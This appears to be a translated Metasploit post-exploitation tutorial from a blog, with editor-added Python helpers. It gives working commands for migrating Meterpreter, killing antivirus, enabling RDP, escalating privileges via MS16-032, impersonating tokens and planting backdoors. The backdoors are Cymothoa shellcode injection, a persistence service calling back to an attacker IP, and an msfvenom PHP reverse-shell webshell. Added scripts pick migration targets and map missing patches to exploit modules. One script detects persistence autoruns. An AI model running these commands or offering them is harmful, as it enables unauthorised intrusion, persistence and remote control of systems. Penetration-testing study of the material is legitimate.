Metasploit (MSF) post-exploitation attacks

Process migration

A freshly obtained shell is fragile: it lives inside the exploited process, and if that process crashes or the user closes it, the session dies with it. So the first step is to migrate Meterpreter into a stable, long-lived process on the target machine.
1. Run ps to list the processes running on the target machine.
2. Run getpid to get the process ID (PID) the shell is currently running in.
3. Look that PID up in the ps output to see which process the shell lives in.
4. Run migrate followed by the PID of the process you want to bind to.
5. Run getpid again: if the PID reported is now the PID you migrated to, the process migration succeeded.
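Picking the migration target is the step where a session is most often lost, so here is an added example (the editor's, not code from the original post or from Metasploit) that parses a Meterpreter ps listing and applies the usual selection rules: same user as the session, same architecture as the session, and a long-lived process such as explorer.exe first. The ps table, the host name WIN7-PC, the user alice and all PIDs below are constructed for the example.

```python
"""Choosing a process to migrate into from Meterpreter's `ps` output.

Added example for this page, not code from the original post or from
Metasploit. The `ps` listing below is constructed to mimic Meterpreter's
table layout (PID, PPID, Name, Arch, Session, User, Path); the selection
rules are the usual practitioner heuristics, stated here as assumptions.
"""

# Constructed sample of Meterpreter `ps` output (not a real capture). The
# columns are fixed width and left-aligned, as Meterpreter prints them.
PS_OUTPUT = r"""
Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System             x64   0
 412   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 624   600   winlogon.exe       x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 1580  1520  explorer.exe       x64   1        WIN7-PC\alice                 C:\Windows\explorer.exe
 2104  1580  notepad.exe        x64   1        WIN7-PC\alice                 C:\Windows\System32\notepad.exe
 2388  1580  calc.exe           x86   1        WIN7-PC\alice                 C:\Windows\SysWOW64\calc.exe
 2700  1580  iexplore.exe       x86   1        WIN7-PC\alice                 C:\Program Files (x86)\Internet Explorer\iexplore.exe
"""

COLUMNS = ("PID", "PPID", "Name", "Arch", "Session", "User", "Path")

# Long-lived processes to prefer, in order (editor's assumption: explorer.exe
# for a user session, the others when the session already runs as SYSTEM).
PREFERRED = ("explorer.exe", "winlogon.exe", "lsass.exe", "spoolsv.exe", "svchost.exe")


def parse_ps(output):
    """Parse Meterpreter `ps` table text into a list of dicts keyed by COLUMNS.

    Columns are located by their start offset in the header line, so names,
    users and paths containing spaces ("NT AUTHORITY\\SYSTEM",
    "C:\\Program Files (x86)\\...") are not split apart.
    """
    lines = output.splitlines()
    header_idx = next(i for i, line in enumerate(lines) if line.lstrip().startswith("PID"))
    header = lines[header_idx]
    # In " PID   PPID ..." index("PID") finds the standalone PID before PPID.
    starts = [header.index(col) for col in COLUMNS]
    procs = []
    for line in lines[header_idx + 1:]:
        if not line.strip() or line.strip().startswith("-"):
            continue  # blank line or the "---" separator row
        row = {}
        for i, col in enumerate(COLUMNS):
            end = starts[i + 1] if i + 1 < len(COLUMNS) else None
            row[col] = line[starts[i]:end].strip()
        procs.append(row)
    return procs


def choose_migration_target(procs, current_pid, current_user, current_arch, preferred=PREFERRED):
    """Return (pid, name) of the process to migrate into, or None.

    Rules (assumptions, the usual practitioner heuristics):
    * same owner as the session: migrating into another user's process needs
      SeDebugPrivilege (in practice SYSTEM) and otherwise fails;
    * same architecture as the session (x86 vs x64), because mixing them is a
      common cause of `migrate` failing or the session dying;
    * never the process we are already in;
    * prefer the long-lived processes in `preferred` order; otherwise fall
      back to any matching process, lowest PID first as a plain tie-breaker.
    """
    candidates = [
        p for p in procs
        if p["PID"].isdigit()
        and int(p["PID"]) != current_pid
        and p["User"].lower() == current_user.lower()
        and p["Arch"].lower() == current_arch.lower()
    ]
    by_name = {}
    for p in candidates:
        by_name.setdefault(p["Name"].lower(), []).append(p)
    for name in preferred:
        if name in by_name:
            best = min(by_name[name], key=lambda p: int(p["PID"]))
            return int(best["PID"]), best["Name"]
    if candidates:
        best = min(candidates, key=lambda p: int(p["PID"]))
        return int(best["PID"]), best["Name"]
    return None


def migrate_command(procs, current_pid, current_user, current_arch):
    """Build the Meterpreter command line for the chosen target, or None."""
    target = choose_migration_target(procs, current_pid, current_user, current_arch)
    return None if target is None else f"migrate {target[0]}"


if __name__ == "__main__":
    procs = parse_ps(PS_OUTPUT)
    # getpid reported 2104 (notepad.exe), getuid reported WIN7-PC\alice, x64 stager
    print(migrate_command(procs, 2104, r"WIN7-PC\alice", "x64"))
```

With the sample above, an x64 session in notepad.exe owned by alice gets migrate 1580 (explorer.exe); an x86 session owned by the same user has no preferred process of its architecture and falls back to calc.exe; a SYSTEM session is steered to winlogon.exe. If getuid and the User column disagree on case or domain prefix, normalise them before calling the function.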

System commands

Once the session is stable, start collecting system information:
1. sysinfo shows the target machine's system information (hostname, OS, architecture, domain).
2. route shows the target's routing table, i.e. its complete network configuration.
3. background puts the current session into the background and returns to the msf console.
4. getuid shows which user the Meterpreter session is running as on the target.
5. run post/windows/manage/killav attempts to kill anti-virus processes on the target.
6. run post/windows/manage/enable_rdp enables the Remote Desktop Protocol (RDP) service on the target.
7. run post/windows/gather/enum_logged_on_users lists the users currently logged on.
8. run post/windows/gather/enum_applications lists the applications installed on the target machine.
9. shell drops into a command shell (cmd.exe) on the target.

Privilege escalation

During a penetration we often obtain only a normal Guest or User account. To continue, the access has to be escalated from Guest to User, then to Administrator, and finally to SYSTEM.

There are two types of privilege escalation:

  • Vertical escalation: a low-privileged account gains the privileges of a high-privileged role (for example, User to Administrator or SYSTEM)
  • Horizontal escalation: an account gains the permissions of another account at the same privilege level

So after obtaining a Meterpreter shell on the target, the first thing to establish is which permissions we currently have:
1. Type shell in the Meterpreter session to enter the target's CMD command line
2. Type whoami /groups to see the groups, and therefore the privileges, of the current account

Using WMIC to check for the MS16-032 local privilege escalation vulnerability

1. First run getuid to confirm the privileges already obtained.
2. Then check which patches the system has installed: use the systeminfo command, or look at the update ".log" files left in C:\windows\.
3. Use the WMIC command to list the installed patches (hotfixes), e.g. wmic qfe get Caption,Description,HotFixID,InstalledOn.
4. Compare that list against the patch (KB) numbers fixed by the available privilege escalation exploits, and pick an exploit whose KB number does not appear in the installed list.
5. To prepare for the escalation, put the Meterpreter session in the background (background) and search for MS16-032 in msfconsole (search ms16-032).
6. Select the corresponding exploit module (use it) and point it at the session to be escalated, e.g. set session 1.
7. run
8. If the escalation succeeds, the returned output shows that a new session has been created; enter it and run getuid to view the current privileges.
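The comparison in steps 3 and 4 is easy to automate. The following is an added example, not code from the original post or from Metasploit: it extracts the installed KB numbers from wmic qfe or systeminfo output (both constructed here) and reports which known privilege escalation fixes are missing. The bulletin-to-KB mapping (MS16-032 to KB3139914, MS15-051 to KB3045171, both for Windows 7 / Server 2008 R2) and the module names are taken from public sources as the editor recalls them and should be checked against the bulletin for the target's exact build.

```python
"""Matching installed hotfixes against known local privilege escalation exploits.

Added example for this page, not code from the original post or from
Metasploit. The hotfix listings below are constructed to look like the output
of `wmic qfe get HotFixID` and of the Hotfix section of `systeminfo`; the KB
numbers and module names in KNOWN_PRIVESC are the editor's recollection of the
public bulletins and Metasploit module names and must be verified before use.
"""
import re

# Constructed sample of `wmic qfe get HotFixID` output (not a real capture);
# wmic pads lines with trailing spaces and uses CRLF line endings.
WMIC_OUTPUT = (
    "HotFixID  \r\n"
    "KB2533552  \r\n"
    "KB2534111  \r\n"
    "KB3045171  \r\n"
    "KB976902  \r\n"
    "\r\n"
)

# Constructed sample of the Hotfix section of `systeminfo` (not a real capture).
SYSTEMINFO_OUTPUT = (
    "Hotfix(s):                 3 Hotfix(s) Installed.\r\n"
    "                           [01]: KB2533552\r\n"
    "                           [02]: KB3045171\r\n"
    "                           [03]: KB976902\r\n"
)

# Bulletin -> (KB that fixes it on Windows 7 / Server 2008 R2, Metasploit module).
# Assumed mapping; verify against the bulletin for the target's OS build.
KNOWN_PRIVESC = {
    "MS15-051": ("KB3045171", "exploit/windows/local/ms15_051_client_copy_image"),
    "MS16-032": ("KB3139914", "exploit/windows/local/ms16_032_secondary_logon_handle_privesc"),
}

KB_RE = re.compile(r"\bKB\d+\b")


def installed_kbs(text):
    """Extract the set of KB identifiers from wmic or systeminfo output."""
    return set(KB_RE.findall(text))


def candidate_exploits(text, table=KNOWN_PRIVESC):
    """Return {bulletin: module} for bulletins whose fixing KB is not installed.

    A missing KB only means that specific fix is absent. It does not prove the
    host is vulnerable: the OS version may not be affected at all, or a later
    cumulative update may supersede the KB. Treat the result as a to-try list.
    """
    present = installed_kbs(text)
    return {bulletin: module for bulletin, (kb, module) in table.items() if kb not in present}


if __name__ == "__main__":
    for bulletin, module in candidate_exploits(WMIC_OUTPUT).items():
        print(f"{bulletin}: fix not installed, try {module}")
```

On the sample, KB3045171 is present, so MS15-051 is ruled out and only MS16-032 is suggested. Paste the real wmic or systeminfo text from the target into the function; the regex does not care about the surrounding layout.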

Token theft

An access token is a temporary key that the system treats as equivalent to an account name and password: it is used to decide whether a request is allowed and which user the request belongs to, and it lets that user access network and system resources without presenting a password or other credentials again. Tokens stay in the system until it is restarted.

Token stealing exploits this: the attacker takes over a token that the authentication server (AS) issued to a client on the compromised server and uses it as if they were that user.

Practical use
1. Load the incognito extension with load incognito (older versions use use incognito), then run list_tokens -u to list the available tokens by user

  • Delegation Tokens: tokens that support interactive logon (for example, a user logged in through Remote Desktop)
  • Impersonation Tokens: tokens from non-interactive access (for example, a network logon)

2. Tokens are listed in the form hostname\username (or domain\username)
3. Call incognito's impersonate_token command to impersonate the user who owns the token; the backslash must be doubled on the Meterpreter command line

impersonate_token hostname\\username

4. After it succeeds, run getuid in Meterpreter (or whoami from a shell) and you will see that we are now running as the impersonated administrator.

Post-exploitation attack: backdoors

After privilege escalation is complete, the next step is to set up a backdoor to maintain control of the target host. That way, even if the vulnerability we exploited is later patched, we can still control the target system through the backdoor.

Operating system backdoor
Cymothoa backdoor
Cymothoa is a backdoor tool that injects shellcode into an existing, running process (the host process). Because the shellcode runs inside a regular program, it is disguised as normal activity, and the injected backdoor is designed to coexist with the host process so as not to arouse the suspicion of administrators. Injecting shellcode into another process has a further advantage: even if the target's security tooling checks the integrity of executable files on disk, it cannot detect the backdoor unless it also inspects process memory.

1. First find the PID of the program that will host the backdoor

  • Linux: ps aux
  • Windows: tasklist

2. Cymothoa takes the PID of the target process through the -p option and the number of the shellcode to inject through the -s option.
3. After the target host has been compromised, copy the Cymothoa executable to it and generate the backdoor there:

cymothoa -p 982 -s 1 -y 4444    // use the process with PID 982 as the host process, choose shellcode type 1, and have the payload listen on port 4444

4. Once that succeeds, connect to the backdoor on the target host (port 4444) with:

nc -nvv 192.168.x.x 4444

Persistence backdoor
persistence is a Meterpreter script that installs a backdoor that starts automatically: it drops a payload file on the target and registers it to run at boot or at logon (through a registry autorun entry or a service).
1. Create the persistent backdoor with the following command

Meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.x.x
  • -A: automatically start a matching multi/handler to receive the connection
  • -S: install the payload as a service so it loads when the system boots (with SYSTEM privileges)
  • -U: start the payload when a user logs on
  • -X: start the payload when the system boots (autorun)
  • -i: interval in seconds between connection attempts back to the handler
  • -p: port on the attacker's machine that the payload connects back to
  • -r: IP address of the attacker's machine (the system running Metasploit) that the payload connects back to

2. If creation succeeds and a handler is listening on that address and port, a new Meterpreter session is established from the target.
3. Enter sessions to list the sessions that have been obtained
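From the defender's side, the artefacts this script leaves behind are what to look for. The following added example (the editor's, not code from the original post or from Metasploit) parses a constructed reg query listing of a CurrentVersion\Run key and flags entries that launch a script from a temp directory, which is the kind of entry the persistence script's -U and -X options create. The value name, file name and paths are made up for the example, and the detection rules are the editor's assumptions, not a complete signature.

```python
"""Spotting a `run persistence` style autorun entry in a Run key listing.

Added example for this page, not code from the original post or from
Metasploit. The persistence script drops a randomly named VBScript in the
user's %TEMP% and registers it under a CurrentVersion\\Run key (or as a
service with -S); the key path, value names and file names below are
constructed, not taken from a real host, and the rules are assumptions.
"""
import re

# Constructed sample of `reg query HKCU\...\Run` output (not a real capture).
REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Steam       REG_SZ    "C:\Program Files (x86)\Steam\steam.exe" -silent
    PzKxqWcdA   REG_SZ    C:\Users\alice\AppData\Local\Temp\RbcTEhZvNkQ.vbs
"""

# One value line: indented name, REG_* type, then the data up to end of line.
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")

# Signs of a dropped-script autorun (assumptions): a script extension or a
# script interpreter in the command, or a launch path inside a temp directory.
SCRIPT_RE = re.compile(
    r"\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd)\b|\b(wscript|cscript|powershell|mshta)(\.exe)?\b",
    re.IGNORECASE,
)
TEMP_RE = re.compile(r"\\(Temp|Tmp)\\|\\AppData\\Local\\Temp\\", re.IGNORECASE)


def parse_run_key(output):
    """Return a list of (name, type, data) triples from `reg query` output."""
    entries = []
    for line in output.splitlines():
        m = VALUE_RE.match(line)
        if m:
            entries.append(m.groups())
    return entries


def suspicious_autoruns(output):
    """Return (name, data, reasons) for Run-key entries that look like a
    dropped persistence script; `reasons` lists the rules that fired."""
    findings = []
    for name, _type, data in parse_run_key(output):
        reasons = []
        if SCRIPT_RE.search(data):
            reasons.append("script interpreter or script file")
        if TEMP_RE.search(data):
            reasons.append("launches from a temp directory")
        if reasons:
            findings.append((name, data, reasons))
    return findings


if __name__ == "__main__":
    for name, data, reasons in suspicious_autoruns(REG_OUTPUT):
        print(f"{name}: {data}  <- {', '.join(reasons)}")
```

Run it over the output of reg query for both the HKCU and HKLM Run keys; the -S variant registers a service instead and needs a matching check over sc query or the Services registry hive, which this example does not cover.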

Web backdoor

A web backdoor generally means a webshell: a piece of web page code written in a server-side language, most commonly PHP, ASP, ASP.NET or JSP.

1. Meterpreter backdoor
msf has a payload called PHP Meterpreter, which can be used to create a PHP webshell that gives a full Meterpreter session.

  • Use msfvenom to create webshell.php
  • Upload webshell.php to the target server
  • Start a Metasploit multi/handler to listen for the connection
  • Browse to the webshell.php page
  • Receive the reverse Meterpreter shell

1. Build the PHP Meterpreter with Metasploit's msfvenom tool

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.x.x -f raw > webshell.php
  • -p sets the payload
  • -f sets the output file format (raw PHP source here; the callback port defaults to 4444 when LPORT is not given)

2. Upload webshell.php to the target server.
3. Start msfconsole and set up the listener for the same payload, address and port:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 4444
run

4. Open http://ip/webshell.php in a browser
5. Back in msf, you can see that the server has connected back, and you can continue to exploit the target host more deeply

Origin blog.csdn.net/weixin_43749601/article/details/114416358